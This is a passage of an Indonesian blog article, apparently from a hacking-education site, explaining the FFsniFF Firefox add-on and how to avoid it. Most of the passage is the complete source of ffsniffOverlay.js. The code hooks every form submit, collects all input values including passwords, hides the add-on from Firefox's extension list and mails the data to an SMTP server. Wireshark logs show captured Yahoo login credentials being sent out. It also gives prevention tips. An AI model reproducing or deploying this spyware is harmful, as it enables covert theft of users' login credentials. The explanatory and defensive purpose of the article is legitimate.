Date: Wed, 04 Mar 2009 11:05:27 +0700
Message-ID:
Dalam email ke telkom.net ada 3 header Received. Yang pertama adalah mx1.mail.plasa.com, ini adalah smtp server yang saya pakai di FFsniFF. Kemudian dari situ email dioper ke mx1.mail.telkom.net, dan terakhir dioper lagi ke f1.c.plasa.com, yang merupakan smtp server yang paling dekat dengan si penerima. Jadi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp server f1.c.plasa.com. Namun karena MX record telkom.net menunjuk ke mx1.mail.telkom.net lebih baik saya pakai smtp server itu, walaupun perlu dioper sebanyak 2 kali untuk sampai di tujuan.
FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication sebelum mengirimkan email. SMTP server tidak mungkin menolak email yang ditujukan untuk domain yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous (tanpa authentication), sebab bila smtp server menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke domain itu.
Karena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain ilmuhacking.com karena smtp server tersebut kemungkinan besar akan menolak dijadikan titik relay pengiriman email ke domain lain. Bila ingin mengirimkan email untuk domain lain tidak bisa secara anonymous, sebelumnya harus memasukkan perintah smtp AUTH LOGIN dan memasukkan username/password dalam base64. Saya tidak akan menjelaskan terlalu panjang soal email, di lain kesempatan akan saya bahas detil cara kerja email.
Pencegahan
Bad guys already know about FFsniff since 3 years ago
FFsniff diciptakan pada bulan maret 2006, tepat 3 tahun yang lalu sehingga addon ini sudah dikenal luas sebagai salah satu tools hacking. Sekarang bagaimana caranya agar kita tidak menjadi korban addon ini?
Berikut ini tips agar tidak menjadi korban FFsniff:
  • Jangan sembarangan menginstall addon yang tidak anda kenal. Install addon hanya dari situs resmi Firefox Addon https://addons.mozilla.org/
  • Install Addon hanya dari situs yang menggunakan https. Penggunaan https ini sangat penting agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah diracuni spyware. Mengenai pentingnya https ini bisa anda baca di artikel: understanding https
  • firefox safe mode
    firefox safe mode
  • Bila anda berada di komputer publik, gunakan Firefox dalam Safe Mode (mode aman). Mode ini adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
  • Walaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia tidak mungkin bisa bersembunyi di file system. Jika anda ragu apakah firefox anda bersih dari FFsniFF, silakan buka folder Profile Mozilla Firefox anda. Biasanya di:
  • 1
    C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\\extensions\
    firefox extension folder
    firefox extension folder
    Kemudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. Atau anda juga bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.
    How FFsniff Works
    Saya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password ketika ada yang login di firefox yang telah dipasang addon ini. Kini saatnya saya menjelaskan cara kerja FFsniff ini. Inti dari FFsniff ini ada pada file ffsniffOverlay.js. File ini berisi semua code yang melakukan sniffing. Berikut adalah source code lengkap ffsniffOverlay.js.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
    var transport = "";
    var outstream = "";
    var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
    var stream = "";
    // find out FF version
    var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);
    var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);
     
    var data = "";
    var data0 = "EHLO " + send_from_host + "\r\n"
    var data1 = "MAIL FROM: <" + send_from + ">\r\n"
    var data2 = "RCPT TO: <" + send_to + ">\r\n"
    var data3 = "DATA\r\n"
    var data4 = "\r\n.\r\n"
    var data5 = "QUIT\r\n"
    function send_data() {
    transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
    outstream = transport.openOutputStream(0, 0, 0);
    stream = transport.openInputStream(0, 0, 0);
    instream.init(stream);
     
    // this will avoid 'Improper use of SMTP command pipelining'
    // error on SMTP servers
    outstream.write(data0, data0.length);
    while (instream.available() == 0) {}
    instream.read(instream.available());
     
    outstream.write(data1, data1.length);
    while (instream.available() == 0) {}
    instream.read(instream.available());
     
    outstream.write(data2, data2.length);
    while (instream.available() == 0) {}
    instream.read(instream.available());
     
    outstream.write(data3, data3.length);
    while (instream.available() == 0) {}
    instream.read(instream.available());
     
    outstream.write(data, data.length);
    // don't read here cos no data was send to us
    //while (instream.available() == 0) {}
    //instream.read(instream.available());
     
    outstream.write(data4, data4.length);
    while (instream.available() == 0) {}
    instream.read(instream.available());
     
    outstream.write(data5, data5.length);
    while (instream.available() == 0) {}
     
    outstream.close();
    instream.close();
    }
    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
    var workingThread = function() {
    };
     
    workingThread.prototype = {
    run: function() {
    send_data();
    }
    };
    } else {
    var runnable = {
    run: function() {
    send_data();
    }
    }
    }
    function sniff() {
    // if we are running under 3.0 or later
    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
    var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);
    thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);
    } else {
    var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
    thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
    }
    }
     
    function do_sniff() {
    var ok = 0;
    var hesla = window.content.document.getElementsByTagName("input");
    data = "";
    for (var i = 0; i < hesla.length; i++) {
    if (hesla[i].value != "") {
    if (hesla[i].type == "password") {
    ok = 1;
    }
    if (hesla[i].name == "") {
    data += hesla[i].type + ":" + ":" + hesla[i].value + "\n";
    }
    else {
    data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
    }
    }
    }
    if (ok == 1) {
    data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
    sniff()
    }
    }
    function hide_me() {
    var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
    var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
    var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
    var root = RDFService.GetResource("urn:mozilla:item:root");
    var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
    Container.Init(extensionDS, root);
    var elements = Container.GetElements();
    while (elements.hasMoreElements()) {
    var element = elements.getNext();
    var name = "";
    var target = extensionDS.GetTarget(element, nameArc, true);
    if (target) {
    name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
    if (name == "FFsniFF") {
    Container.RemoveElement(element, true);
    }
    }
    }
    }
    if (enable_hide == "yes") {
    hide_me();
    }
    window.addEventListener("submit", do_sniff, false);
    Perhatikan baris ke-127 pada source di atas, bila enable_hide diset “yes”, maka ffsniff akan menjalankan fungsi hide_me(). hide_me() bertugas menghilangkan FFsniff dari daftar addon agar kehadirannya tidak disadari pengguna. Cara menyembunyikan diri adalah dengan cara menjalankan fungsi Container.RemoveElement (baris ke-122) hanya bila element itu bernama “FFsniFF”.
    how ffsniff works
    how ffsniff works
    Fungsi sniffing sesungguhnya ada pada baris terakhir. Pada baris terakhir, terdapat fungsi addEventListener(). Fungsi ini berguna untuk mengaitkan event submit dengan fungsi do_sniff. Artinya fungsi do_sniff akan dijalankan setiap kali terjadi event submit. Event submit akan terjadi bila ada request POST di browser, antara lain dengan melalui klik tombol bertipe submit (input type=”submit”). Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh javascript. Dengan cara apapun, bila terjadi request POST di browser, event submit akan terjadi, dan artinya fungsi do_sniff juga akan dipanggil. Untuk lebih jelasnya perhatikan gambar di atas.
    Kini fokus perhatian kita pindah ke fungsi do_sniff (baris ke-84). Dalam fungsi sniff, ffsniffer mengambil daftar semua tag yang ada dengan fungsi window.content.document.getElementsByTagName(“input”). Kemudian semua field tersebut akan digabung dalam variabel string data. Hanya bila dalam form tersebut terdapat password field (input type=”password”), maka ffsniffer akan mengirimkan email, bila hanya form biasa (bukan form login), ffsniffer tidak akan mengirim email.
    Bila mengandung password field, berikutnya fungsi sniff (baris ke-73) akan dijalankan. Fungsi sniff ini tugasnya hanya membuat dan menjalankan thread. Thread tersebut bertugas melakukan pengiriman email dengan memanggil fungsi send_data (baris ke-17). Fungsi send_data akan membuka koneksi tcp ke smtp server, kemudian mengirimkan perintah smtp untuk mengirim email. Dengan menggunakan sniffer Wireshark, berikut adalah komunikasi yang terjadi ketika email dikirim ke telkom.net:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    220-mx1.mail.plasa.com ESMTP
    220 UBE, porn, and abusive content not allowed
    EHLO telkom.net
    250-mx1.mail.plasa.com
    250-8BITMIME
    250 SIZE 20971520
    MAIL FROM:
    250 sender ok
    RCPT TO:
    250 recipient ok
    DATA
    354 go ahead
    Subject: Log Firefox Sniffer
     
    https://login.yahoo.com/config/login?
    type:name:value
    ---------------
    hidden:.tries:2
    hidden:.intl:us
    hidden:.u:6220o3t4qrv31
    hidden:.v:0
    hidden:.challenge:Uhh09ZXeYC4rgGkrSkirh.TXeHk_
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordku
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 ok: Message 119895912 accepted
    221 mx1.mail.plasa.com
    QUIT
    Sedangkan komunikasi yang terjadi ketika email dikirim ke @ilmuhacking.com adalah:
    220-gator669.hostgator.com ESMTP Exim 4.69 #1 Tue, 03 Mar 2009 22:15:33 -0600 
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
    EHLO ilmuhacking.com
    250-gator669.hostgator.com Hello ilmuhacking.com [202.43.xxx.xxx]
    250-SIZE 52428800
    250-PIPELINING
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
    MAIL FROM:
    250 OK
    RCPT TO:
    250 Accepted
    DATA
    354 Enter message, ending with "." on a line by itself
    Subject: Log Firefox Sniffer
     
    https://login.yahoo.com/config/login?
    type:name:value
    ---------------
    hidden:.tries:1
    hidden:.intl:us
    hidden:.u:eljvtc94qs023
    hidden:.v:0
    hidden:.challenge:7FWzfTnmnC3Njv1YadcWnM61LyIw
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordakujuga
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 OK id=1LeiW6-0002zu-LA
    QUIT
    221 gator669.hostgator.com closing connection
    Dengan selesainya eksekusi send_data() maka ffsniff telah selesai menjalankan tugasnya mengirim email. Selanjutnya ffsniff akan “tidur” menunggu dipanggil oleh event submit dan mulai kembali proses penyadapan password.
Learn more »